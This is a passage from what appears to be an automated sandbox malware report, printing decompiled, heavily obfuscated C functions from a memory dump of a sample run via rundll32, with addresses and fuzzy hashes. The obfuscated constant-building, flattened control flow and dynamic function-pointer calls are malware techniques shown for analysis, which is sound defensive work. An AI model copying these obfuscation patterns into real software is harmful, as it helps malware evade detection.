				_v36 = _v36 * 0x48;
				_v36 = _v36 + 0xffff17a0;
				_t129 = 0x184d0e0;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0x33821a89;
				_v28 = 0x501440;
				_v28 = _v28 + 0x91aa;
				_v28 = _v28 ^ 0x04b9c112;
				_v28 = _v28 ^ 0x04ea9889;
				_v32 = 0xb3d9a7;
				_t113 = 0x1d;
				_v32 = _v32 * 0x13;
				_v32 = _v32 * 0x6a;
				_v32 = _v32 ^ 0x86e7717c;
				_v40 = 0x7a3277;
				_t30 =  &_v40; // 0x7a3277
				_v40 =  *_t30 * 0x26;
				_v40 = _v40 + 0x92c7;
				_v40 = _v40 << 6;
				_v40 = _v40 ^ 0x89042107;
				_v12 = 0xe6e512;
				_v12 = _v12 / _t113;
				_v12 = _v12 ^ 0x0000e0e8;
				_v16 = 0xf852d4;
				_t114 = 0x7e;
				_v16 = _v16 / _t114;
				_v16 = _v16 ^ 0x2a7b237e;
				_v16 = _v16 ^ 0x2a71b8af;
				_v20 = 0xa37a15;
				_v20 = _v20 + 0xffff21a5;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x000b71fe;
				_v4 = 0x3aba4b;
				_v4 = _v4 ^ 0x2eee7843;
				_v4 = _v4 ^ 0x2ed9fad0;
				_v24 = 0x4dcf39;
				_t115 = 0x4a;
				_v24 = _v24 / _t115;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x434ce119;
				_t116 =  *0x2d5208; // 0x0
				do {
					while(_t129 != 0x184d0e0) {
						if(_t129 == 0x7e35d81) {
							_t108 = E002C4EFF(E002C99AA, _v16, _t116, _t116, _v20, _v4, _t116, _v24, 0);
							_t116 =  *0x2d5208; // 0x0
							 *((intOrPtr*)(_t116 + 0x14)) = _t108;
						} else {
							if(_t129 != 0xb90d6f1) {
								goto L6;
							} else {
								_push(_v12);
								_push(_v40);
								_t111 = E002C11FC(_v32);
								_t116 =  *0x2d5208; // 0x0
								_t131 = _t131 - 0xc + 0x14;
								_t129 = 0x7e35d81;
								 *_t116 = _t111;
								continue;
							}
						}
						L9:
						return 0 | _t116 != 0x00000000;
					}
					_push(_t116);
					_push(_t116);
					_t117 = 0x18;
					_t116 = E002C3512(_t117);
					_t129 = 0xb90d6f1;
					 *0x2d5208 = _t116;
					L6:
				} while (_t129 != 0x93e05db);
				goto L9;
			}






















                                                                                                                      0x002bb821
                                                                                                                      0x002bb824
                                                                                                                      0x002bb82e
                                                                                                                      0x002bb833
                                                                                                                      0x002bb83b
                                                                                                                      0x002bb84c
                                                                                                                      0x002bb855
                                                                                                                      0x002bb85d
                                                                                                                      0x002bb85f
                                                                                                                      0x002bb869
                                                                                                                      0x002bb876
                                                                                                                      0x002bb87e
                                                                                                                      0x002bb886
                                                                                                                      0x002bb88e
                                                                                                                      0x002bb896
                                                                                                                      0x002bb8a5
                                                                                                                      0x002bb8a8
                                                                                                                      0x002bb8b1
                                                                                                                      0x002bb8b5
                                                                                                                      0x002bb8bd
                                                                                                                      0x002bb8c5
                                                                                                                      0x002bb8ca
                                                                                                                      0x002bb8ce
                                                                                                                      0x002bb8d6
                                                                                                                      0x002bb8db
                                                                                                                      0x002bb8e3
                                                                                                                      0x002bb8f3
                                                                                                                      0x002bb8f7
                                                                                                                      0x002bb8ff
                                                                                                                      0x002bb90b
                                                                                                                      0x002bb910
                                                                                                                      0x002bb916
                                                                                                                      0x002bb91e
                                                                                                                      0x002bb926
                                                                                                                      0x002bb92e
                                                                                                                      0x002bb936
                                                                                                                      0x002bb93b
                                                                                                                      0x002bb943
                                                                                                                      0x002bb94b
                                                                                                                      0x002bb953
                                                                                                                      0x002bb95b
                                                                                                                      0x002bb967
                                                                                                                      0x002bb96a
                                                                                                                      0x002bb96e
                                                                                                                      0x002bb973
                                                                                                                      0x002bb97b
                                                                                                                      0x002bb981
                                                                                                                      0x002bb981
                                                                                                                      0x002bb987
                                                                                                                      0x002bb9f6
                                                                                                                      0x002bb9fb
                                                                                                                      0x002bba04
                                                                                                                      0x002bb989
                                                                                                                      0x002bb98b
                                                                                                                      0x00000000
                                                                                                                      0x002bb98d
                                                                                                                      0x002bb98d
                                                                                                                      0x002bb991
                                                                                                                      0x002bb99c
                                                                                                                      0x002bb9a1
                                                                                                                      0x002bb9a7
                                                                                                                      0x002bb9aa
                                                                                                                      0x002bb9ac
                                                                                                                      0x00000000
                                                                                                                      0x002bb9ac
                                                                                                                      0x002bb98b
                                                                                                                      0x002bba08
                                                                                                                      0x002bba15
                                                                                                                      0x002bba15
                                                                                                                      0x002bb9bc
                                                                                                                      0x002bb9bd
                                                                                                                      0x002bb9c0
                                                                                                                      0x002bb9c8
                                                                                                                      0x002bb9ca
                                                                                                                      0x002bb9cc
                                                                                                                      0x002bb9d2
                                                                                                                      0x002bb9d2
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Cx.$w2z$~#{*
                                                                                                                      • API String ID: 0-3781971293
                                                                                                                      • Opcode ID: 7420e28c65d44cf280a28d983838766ff6d4f2fa4c5b2c474636c404f7ffa515
                                                                                                                      • Instruction ID: 44258c0ba84cfaa226c8f29a2647263aa7bb68cdd2c3eeb7038b28d87304c380
                                                                                                                      • Opcode Fuzzy Hash: 7420e28c65d44cf280a28d983838766ff6d4f2fa4c5b2c474636c404f7ffa515
                                                                                                                      • Instruction Fuzzy Hash: 2E5189715093019FC308DF29E88A94BBBE1FBC8758F108A1DF595A7260D3B1DA598F87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B44FA Relevance: 3.9, Strings: 3, Instructions: 122COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E002B44FA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v520;
				char _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* _t110;
				signed int _t116;
				signed int _t120;
				void* _t126;
				signed int _t135;
				signed int _t136;
				void* _t138;
				signed int* _t141;

				_push(_a12);
				_t138 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t110);
				_v584 = 0x353aee;
				_t141 =  &(( &_v596)[5]);
				_t126 = 0x2b8a3ea;
				_t135 = 0x6c;
				_v584 = _v584 * 0x28;
				_v584 = _v584 | 0xfff7ffbb;
				_v584 = _v584 ^ 0xfff7ffab;
				_v560 = 0x47639d;
				_v560 = _v560 + 0xffffee4d;
				_v560 = _v560 ^ 0x00482f45;
				_v568 = 0x9954f4;
				_v568 = _v568 >> 4;
				_v568 = _v568 << 0xe;
				_v568 = _v568 ^ 0x655e48ca;
				_v572 = 0x27eb8;
				_v572 = _v572 << 0xf;
				_v572 = _v572 | 0x08d3f6f7;
				_v572 = _v572 ^ 0x4e414fab;
				_v572 = _v572 ^ 0x7197c1a5;
				_v592 = 0xd88b27;
				_v592 = _v592 | 0xcb2a0632;
				_v592 = _v592 ^ 0x61d9313a;
				_v592 = _v592 * 0x31;
				_v592 = _v592 ^ 0x90d0f268;
				_v564 = 0x1e6f95;
				_v564 = _v564 + 0xffffd458;
				_v564 = _v564 ^ 0x0016c965;
				_v556 = 0x7ec301;
				_v556 = _v556 / _t135;
				_v556 = _v556 ^ 0x0008e3f1;
				_v576 = 0xe82a72;
				_v576 = _v576 >> 7;
				_t116 = _v576;
				_t136 = 0x3f;
				_t134 = _t116 % _t136;
				_v576 = _t116 / _t136;
				_v576 = _v576 * 0x66;
				_v576 = _v576 ^ 0x00094998;
				_v596 = 0x9d9cf;
				_v596 = _v596 + 0xffff3374;
				_v596 = _v596 ^ 0xdf943dc0;
				_v596 = _v596 ^ 0x9d51af04;
				_v596 = _v596 ^ 0x42c0e9a6;
				_v580 = 0x1688bd;
				_v580 = _v580 >> 0xa;
				_v580 = _v580 + 0xf36b;
				_v580 = _v580 * 0x11;
				_v580 = _v580 ^ 0x001dff3c;
				_v588 = 0xc39d29;
				_v588 = _v588 + 0xc15a;
				_t120 = _v588 * 0x65;
				_v588 = _t120;
				_v588 = _v588 << 0x10;
				_v588 = _v588 ^ 0x49a37055;
				do {
					while(_t126 != 0x10fdd0e) {
						if(_t126 == 0x1b35a13) {
							return E002C9045(_v596, _t134,  &_v520, _t138,  &_v552, _v580, _v588);
						}
						if(_t126 != 0x2b8a3ea) {
							goto L6;
						}
						_t134 =  &_v552;
						_t120 = E002D1310(_v584,  &_v552, _v560, _v568, _v572, _v592);
						_t141 =  &(_t141[4]);
						_t126 = 0x10fdd0e;
					}
					_push(_t126);
					_t134 =  &_v520;
					_t120 = E002BAC8C(_v564,  &_v520, _v556, _v576);
					_t141 =  &(_t141[3]);
					_t126 = 0x1b35a13;
					L6:
				} while (_t126 != 0x712552c);
				return _t120;
			}
























                                                                                                                      0x002b4504
                                                                                                                      0x002b450b
                                                                                                                      0x002b450d
                                                                                                                      0x002b4514
                                                                                                                      0x002b451b
                                                                                                                      0x002b451c
                                                                                                                      0x002b451d
                                                                                                                      0x002b4522
                                                                                                                      0x002b452a
                                                                                                                      0x002b453e
                                                                                                                      0x002b4542
                                                                                                                      0x002b4543
                                                                                                                      0x002b4547
                                                                                                                      0x002b454f
                                                                                                                      0x002b4557
                                                                                                                      0x002b455f
                                                                                                                      0x002b4567
                                                                                                                      0x002b456f
                                                                                                                      0x002b4577
                                                                                                                      0x002b457c
                                                                                                                      0x002b4581
                                                                                                                      0x002b4589
                                                                                                                      0x002b4591
                                                                                                                      0x002b4596
                                                                                                                      0x002b459e
                                                                                                                      0x002b45a6
                                                                                                                      0x002b45ae
                                                                                                                      0x002b45b6
                                                                                                                      0x002b45be
                                                                                                                      0x002b45cd
                                                                                                                      0x002b45d1
                                                                                                                      0x002b45d9
                                                                                                                      0x002b45e1
                                                                                                                      0x002b45e9
                                                                                                                      0x002b45f1
                                                                                                                      0x002b4601
                                                                                                                      0x002b4605
                                                                                                                      0x002b460d
                                                                                                                      0x002b4615
                                                                                                                      0x002b461a
                                                                                                                      0x002b461e
                                                                                                                      0x002b461f
                                                                                                                      0x002b4626
                                                                                                                      0x002b462f
                                                                                                                      0x002b4633
                                                                                                                      0x002b463b
                                                                                                                      0x002b4643
                                                                                                                      0x002b464b
                                                                                                                      0x002b4653
                                                                                                                      0x002b465b
                                                                                                                      0x002b4663
                                                                                                                      0x002b466b
                                                                                                                      0x002b4670
                                                                                                                      0x002b467d
                                                                                                                      0x002b4681
                                                                                                                      0x002b4689
                                                                                                                      0x002b4691
                                                                                                                      0x002b4699
                                                                                                                      0x002b469e
                                                                                                                      0x002b46a2
                                                                                                                      0x002b46a7
                                                                                                                      0x002b46af
                                                                                                                      0x002b46af
                                                                                                                      0x002b46b5
                                                                                                                      0x00000000
                                                                                                                      0x002b4720
                                                                                                                      0x002b46b9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b46bf
                                                                                                                      0x002b46d3
                                                                                                                      0x002b46d8
                                                                                                                      0x002b46db
                                                                                                                      0x002b46db
                                                                                                                      0x002b46df
                                                                                                                      0x002b46e4
                                                                                                                      0x002b46f0
                                                                                                                      0x002b46f5
                                                                                                                      0x002b46f8
                                                                                                                      0x002b46fa
                                                                                                                      0x002b46fa
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: E/H$r*$:5
                                                                                                                      • API String ID: 0-3508030207
                                                                                                                      • Opcode ID: bdc7eb3c234c05e9e6cdbdc0e6f0d16dbbad6f054e1b81a557a4ca66bb56ad1d
                                                                                                                      • Instruction ID: c4516f9db0301c7ce238d543493994c46bc9618c5b0f8cdbc00c53a90df3e7b8
                                                                                                                      • Opcode Fuzzy Hash: bdc7eb3c234c05e9e6cdbdc0e6f0d16dbbad6f054e1b81a557a4ca66bb56ad1d
                                                                                                                      • Instruction Fuzzy Hash: 6D5131714083429BC748DF21C98A81FBBE1BBD8748F505A1DF09AA6221D7B18A59CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BAE9A Relevance: 3.9, Strings: 3, Instructions: 115COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002BAE9A() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				void* _t93;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				intOrPtr _t109;
				signed int* _t111;

				_t111 =  &_v364;
				_v332 = 0xbc8cfe;
				_t109 = 0;
				_t93 = 0x544b857;
				_v328 = 0;
				_v324 = 0;
				_v348 = 0xa18708;
				_v348 = _v348 | 0xdf6aec5f;
				_v348 = _v348 ^ 0xdfe83fdc;
				_v356 = 0xddc275;
				_v356 = _v356 + 0xef66;
				_t105 = 0x44;
				_v356 = _v356 / _t105;
				_v356 = _v356 ^ 0x000c07d0;
				_v360 = 0xb33a69;
				_v360 = _v360 + 0x311b;
				_v360 = _v360 + 0xffff8b8d;
				_v360 = _v360 ^ 0x00b7daa7;
				_v364 = 0x70c027;
				_t106 = 0x45;
				_v364 = _v364 / _t106;
				_v364 = _v364 >> 3;
				_t107 = 0x76;
				_v364 = _v364 / _t107;
				_v364 = _v364 ^ 0x00047190;
				_v340 = 0xefeeea;
				_v340 = _v340 >> 9;
				_v340 = _v340 ^ 0x00027f77;
				_v352 = 0xde5c51;
				_v352 = _v352 + 0xffff1c5e;
				_v352 = _v352 ^ 0x00dc38de;
				_v344 = 0x59a1b5;
				_v344 = _v344 + 0xf1eb;
				_v344 = _v344 ^ 0x005dc95d;
				_v336 = 0x74ce3f;
				_v336 = _v336 + 0xffffdac0;
				_v336 = _v336 ^ 0x0079bed4;
				do {
					while(_t93 != 0x136692) {
						if(_t93 == 0x147bc0f) {
							_t93 = 0xf967eb2;
							_t109 = _t109 + _v276 * 0x64;
							continue;
						} else {
							if(_t93 == 0x544b857) {
								_t93 = 0x136692;
								continue;
							} else {
								if(_t93 == 0x6e5561d) {
									_t93 = 0xde10965;
									_t109 = _t109 + (_v2 & 0x000000ff) * 0x186a0;
									continue;
								} else {
									if(_t93 == 0x9c7e626) {
										E002B3D8A(_v340,  &_v320, _v352, _v344, _v336);
										_t111 =  &(_t111[3]);
										_t93 = 0x6e5561d;
										continue;
									} else {
										if(_t93 == 0xde10965) {
											_t93 = 0x147bc0f;
											_t109 = _t109 + _v280 * 0x3e8;
											continue;
										} else {
											if(_t93 != 0xf967eb2) {
												goto L16;
											} else {
												_t109 = _t109 + (_v320 & 0x0000ffff);
											}
										}
									}
								}
							}
						}
						L9:
						return _t109;
					}
					_v284 = 0x11c;
					E002C5A5C( &_v284, _v348, _v356, _v360, _v364);
					_t111 =  &(_t111[3]);
					_t93 = 0x9c7e626;
					L16:
				} while (_t93 != 0xf3c44c2);
				goto L9;
			}

























                                                                                                                      0x002bae9a
                                                                                                                      0x002baea0
                                                                                                                      0x002baead
                                                                                                                      0x002baeaf
                                                                                                                      0x002baeb4
                                                                                                                      0x002baebd
                                                                                                                      0x002baec6
                                                                                                                      0x002baece
                                                                                                                      0x002baed6
                                                                                                                      0x002baede
                                                                                                                      0x002baee6
                                                                                                                      0x002baef5
                                                                                                                      0x002baefa
                                                                                                                      0x002baf00
                                                                                                                      0x002baf08
                                                                                                                      0x002baf10
                                                                                                                      0x002baf18
                                                                                                                      0x002baf20
                                                                                                                      0x002baf28
                                                                                                                      0x002baf34
                                                                                                                      0x002baf39
                                                                                                                      0x002baf3f
                                                                                                                      0x002baf48
                                                                                                                      0x002baf50
                                                                                                                      0x002baf54
                                                                                                                      0x002baf5c
                                                                                                                      0x002baf64
                                                                                                                      0x002baf69
                                                                                                                      0x002baf71
                                                                                                                      0x002baf79
                                                                                                                      0x002baf81
                                                                                                                      0x002baf89
                                                                                                                      0x002baf91
                                                                                                                      0x002baf99
                                                                                                                      0x002bafa1
                                                                                                                      0x002bafa9
                                                                                                                      0x002bafb1
                                                                                                                      0x002bafb9
                                                                                                                      0x002bafb9
                                                                                                                      0x002bafc3
                                                                                                                      0x002bb05c
                                                                                                                      0x002bb05e
                                                                                                                      0x00000000
                                                                                                                      0x002bafc9
                                                                                                                      0x002bafcf
                                                                                                                      0x002bb050
                                                                                                                      0x00000000
                                                                                                                      0x002bafd1
                                                                                                                      0x002bafd7
                                                                                                                      0x002bb03e
                                                                                                                      0x002bb049
                                                                                                                      0x00000000
                                                                                                                      0x002bafd9
                                                                                                                      0x002bafdf
                                                                                                                      0x002bb027
                                                                                                                      0x002bb02c
                                                                                                                      0x002bb02f
                                                                                                                      0x00000000
                                                                                                                      0x002bafe1
                                                                                                                      0x002bafe7
                                                                                                                      0x002bb00d
                                                                                                                      0x002bb00f
                                                                                                                      0x00000000
                                                                                                                      0x002bafe9
                                                                                                                      0x002bafeb
                                                                                                                      0x00000000
                                                                                                                      0x002baff1
                                                                                                                      0x002baff6
                                                                                                                      0x002baff6
                                                                                                                      0x002bafeb
                                                                                                                      0x002bafe7
                                                                                                                      0x002bafdf
                                                                                                                      0x002bafd7
                                                                                                                      0x002bafcf
                                                                                                                      0x002baff9
                                                                                                                      0x002bb004
                                                                                                                      0x002bb004
                                                                                                                      0x002bb06d
                                                                                                                      0x002bb081
                                                                                                                      0x002bb086
                                                                                                                      0x002bb089
                                                                                                                      0x002bb08e
                                                                                                                      0x002bb08e
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: e$e$f
                                                                                                                      • API String ID: 0-1877623186
                                                                                                                      • Opcode ID: 3bc59c3c401371c9cdb65951a26b58042382158b88ab3837599062e84b37cfbd
                                                                                                                      • Instruction ID: 93901cf2bd1ce287364c1920ddde1019b23518b1330b3e9f744327c1b2e3183c
                                                                                                                      • Opcode Fuzzy Hash: 3bc59c3c401371c9cdb65951a26b58042382158b88ab3837599062e84b37cfbd
                                                                                                                      • Instruction Fuzzy Hash: 5741CAB16183028BC718CF11D4854AFBAE1EBD4788F148A2EF59A56260D3B5CA19CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B6C29 Relevance: 3.8, Strings: 3, Instructions: 94COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E002B6C29() {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _v44;
				intOrPtr _v48;
				void* _t89;
				intOrPtr _t98;
				signed int _t102;
				signed int _t103;
				void* _t105;

				_v48 = 0xcb88bc;
				asm("stosd");
				_t102 = 0x47;
				asm("stosd");
				_t89 = 0xf0122cf;
				asm("stosd");
				_v16 = 0x79c750;
				_v16 = _v16 + 0x2192;
				_v16 = _v16 ^ 0x37fffb71;
				_v16 = _v16 + 0xffff9df1;
				_v16 = _v16 ^ 0x3784de23;
				_v12 = 0x72aa7c;
				_v12 = _v12 * 0x4d;
				_v12 = _v12 + 0x37d5;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x02292cf3;
				_v8 = 0x96e633;
				_v8 = _v8 ^ 0x4b98ff22;
				_v8 = _v8 ^ 0x9d1458e0;
				_v8 = _v8 | 0xdef8ea17;
				_v8 = _v8 ^ 0xdef824a2;
				_v28 = 0x117d;
				_v28 = _v28 / _t102;
				_v28 = _v28 >> 0x10;
				_v28 = _v28 ^ 0x00058012;
				_v24 = 0x3d67df;
				_v24 = _v24 | 0x442c4c66;
				_t44 =  &_v24; // 0x442c4c66
				_t103 = 0x76;
				_v24 =  *_t44 / _t103;
				_v24 = _v24 ^ 0x009d94f1;
				_v32 = 0x4e376f;
				_v32 = _v32 << 0xd;
				_v32 = _v32 ^ 0xc6ef13b7;
				_v20 = 0x3e602c;
				_v20 = _v20 ^ 0x8d0d4ca7;
				_v20 = _v20 << 6;
				_v20 = _v20 * 0x6d;
				_v20 = _v20 ^ 0xb2734839;
				do {
					while(_t89 != 0x600d2ee) {
						if(_t89 == 0xf0122cf) {
							_push(_t89);
							_push(_t89);
							 *0x2d5210 = E002C3512(0x138);
							_t89 = 0x600d2ee;
							continue;
						}
						goto L5;
					}
					_t98 =  *0x2d5210; // 0x0
					E002CA156(_v28, _t98 + 0x1c, _v24, _v32, _v20);
					_t105 = _t105 + 0xc;
					_t89 = 0x7d77246;
					L5:
				} while (_t89 != 0x7d77246);
				return 1;
			}

















                                                                                                                      0x002b6c2f
                                                                                                                      0x002b6c40
                                                                                                                      0x002b6c48
                                                                                                                      0x002b6c4b
                                                                                                                      0x002b6c4c
                                                                                                                      0x002b6c4e
                                                                                                                      0x002b6c4f
                                                                                                                      0x002b6c5b
                                                                                                                      0x002b6c62
                                                                                                                      0x002b6c69
                                                                                                                      0x002b6c70
                                                                                                                      0x002b6c77
                                                                                                                      0x002b6c82
                                                                                                                      0x002b6c85
                                                                                                                      0x002b6c8c
                                                                                                                      0x002b6c90
                                                                                                                      0x002b6c97
                                                                                                                      0x002b6c9e
                                                                                                                      0x002b6ca5
                                                                                                                      0x002b6cac
                                                                                                                      0x002b6cb3
                                                                                                                      0x002b6cba
                                                                                                                      0x002b6cc8
                                                                                                                      0x002b6ccb
                                                                                                                      0x002b6ccf
                                                                                                                      0x002b6cd6
                                                                                                                      0x002b6cdd
                                                                                                                      0x002b6ce4
                                                                                                                      0x002b6ce7
                                                                                                                      0x002b6cef
                                                                                                                      0x002b6cf2
                                                                                                                      0x002b6cf9
                                                                                                                      0x002b6d00
                                                                                                                      0x002b6d04
                                                                                                                      0x002b6d0b
                                                                                                                      0x002b6d12
                                                                                                                      0x002b6d19
                                                                                                                      0x002b6d21
                                                                                                                      0x002b6d24
                                                                                                                      0x002b6d2b
                                                                                                                      0x002b6d2b
                                                                                                                      0x002b6d31
                                                                                                                      0x002b6d3c
                                                                                                                      0x002b6d3d
                                                                                                                      0x002b6d4a
                                                                                                                      0x002b6d4f
                                                                                                                      0x00000000
                                                                                                                      0x002b6d4f
                                                                                                                      0x00000000
                                                                                                                      0x002b6d31
                                                                                                                      0x002b6d5c
                                                                                                                      0x002b6d68
                                                                                                                      0x002b6d6d
                                                                                                                      0x002b6d70
                                                                                                                      0x002b6d72
                                                                                                                      0x002b6d72
                                                                                                                      0x002b6d7f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,`>$fL,D$o7N
                                                                                                                      • API String ID: 0-3130479144
                                                                                                                      • Opcode ID: c8de906648f07994677401953716683c1fd555a198a8c108b24852bb199dc41b
                                                                                                                      • Instruction ID: 8875874a5ba5acf4fb5f06e90bac566ff3f4c06b5e0fb388ed7d3247602e6f94
                                                                                                                      • Opcode Fuzzy Hash: c8de906648f07994677401953716683c1fd555a198a8c108b24852bb199dc41b
                                                                                                                      • Instruction Fuzzy Hash: D34136B1E1021AEBDF49CFA4D98A4EEBBB1FF44314F208559D511A7260D3B44B45CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B6ED6 Relevance: 3.8, Strings: 3, Instructions: 88COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 65%
                                                                                                                      			E002B6ED6(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t87;
				void* _t89;
				intOrPtr* _t90;
				signed int _t93;
				intOrPtr _t104;

				_v48 = 0x387a4d;
				_v44 = 0;
				_v40 = 0;
				_v24 = 0x2424c8;
				_v24 = _v24 ^ 0x2613c361;
				_t93 = 0x67;
				_t104 = _a4;
				_v24 = _v24 * 0x39;
				_v24 = _v24 ^ 0x8272caac;
				_v8 = 0x1db7b6;
				_v8 = _v8 * 0x22;
				_v8 = _v8 + 0xffff08c1;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x7e2ce57a;
				_v32 = 0xc3f5b3;
				_v32 = _v32 * 0x7f;
				_v32 = _v32 ^ 0x61389900;
				_v12 = 0x2d74a5;
				_v12 = _v12 / _t93;
				_v12 = _v12 + 0xffffbd08;
				_v12 = _v12 * 0x6a;
				_v12 = _v12 ^ 0x0019f3c3;
				_v28 = 0x7d8734;
				_v28 = _v28 >> 7;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x000207bd;
				_v20 = 0x79f3b3;
				_v20 = _v20 | 0xe743018d;
				_v20 = _v20 + 0xb3b6;
				_v20 = _v20 + 0x51ad;
				_v20 = _v20 ^ 0xe775faa1;
				_v36 = 0x6d6a5a;
				_v36 = _v36 << 0xd;
				_v36 = _v36 ^ 0xad48a6bc;
				_v16 = 0x62a4bc;
				_v16 = _v16 >> 7;
				_v16 = _v16 << 0xa;
				_v16 = _v16 * 0x38;
				_v16 = _v16 ^ 0xac926db4;
				_t87 =  *((intOrPtr*)(_t104 + 0xc))( *((intOrPtr*)(_t104 + 0x30)), 1, 0);
				_t109 = _t87;
				if(_t87 != 0) {
					_push(0x2b188c);
					_push(_v32);
					_t72 =  &_v8; // 0x7e2ce57a
					_t89 = E002BBB4B(_v24,  *_t72, _t109);
					_push( *((intOrPtr*)(_t104 + 0x30)));
					_t106 = _t89;
					_push(_v28);
					_t90 = E002C9861(_v12, _t89);
					if(_t90 != 0) {
						 *_t90();
					}
					E002BAE03(_v20, _v36, _v16, _t106);
				}
				return 0;
			}



















                                                                                                                      0x002b6edc
                                                                                                                      0x002b6ee8
                                                                                                                      0x002b6eeb
                                                                                                                      0x002b6eee
                                                                                                                      0x002b6ef5
                                                                                                                      0x002b6f03
                                                                                                                      0x002b6f04
                                                                                                                      0x002b6f07
                                                                                                                      0x002b6f0a
                                                                                                                      0x002b6f11
                                                                                                                      0x002b6f1f
                                                                                                                      0x002b6f22
                                                                                                                      0x002b6f29
                                                                                                                      0x002b6f2d
                                                                                                                      0x002b6f34
                                                                                                                      0x002b6f3f
                                                                                                                      0x002b6f42
                                                                                                                      0x002b6f49
                                                                                                                      0x002b6f55
                                                                                                                      0x002b6f58
                                                                                                                      0x002b6f63
                                                                                                                      0x002b6f66
                                                                                                                      0x002b6f6d
                                                                                                                      0x002b6f74
                                                                                                                      0x002b6f78
                                                                                                                      0x002b6f7b
                                                                                                                      0x002b6f82
                                                                                                                      0x002b6f89
                                                                                                                      0x002b6f90
                                                                                                                      0x002b6f97
                                                                                                                      0x002b6f9e
                                                                                                                      0x002b6fa5
                                                                                                                      0x002b6fac
                                                                                                                      0x002b6fb0
                                                                                                                      0x002b6fb7
                                                                                                                      0x002b6fbe
                                                                                                                      0x002b6fc2
                                                                                                                      0x002b6fca
                                                                                                                      0x002b6fcd
                                                                                                                      0x002b6fd7
                                                                                                                      0x002b6fda
                                                                                                                      0x002b6fdc
                                                                                                                      0x002b6fde
